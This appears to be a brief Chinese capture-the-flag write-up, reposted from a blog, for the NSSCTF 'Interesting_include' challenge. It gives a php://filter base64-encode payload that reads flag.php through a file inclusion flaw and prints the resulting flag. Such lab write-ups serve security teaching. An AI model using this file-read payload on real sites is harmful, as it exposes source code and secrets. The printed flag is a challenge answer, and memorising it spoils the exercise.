NSSCTF Interesting_include
发布时间:2024年01月08日
开启环境:
通过审计,我们可知:
flag在flag.php中,可以利用php中伪协议
payload:?filter=php://filter/read=convert.base64-encode/resource=flag.php?
将其base64解码就是flag.
NSSCTF{3dc54721-be9e-444c-8228-7133fba76ad4}?
文章来源:https://blog.csdn.net/weixin_74336671/article/details/135449308
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!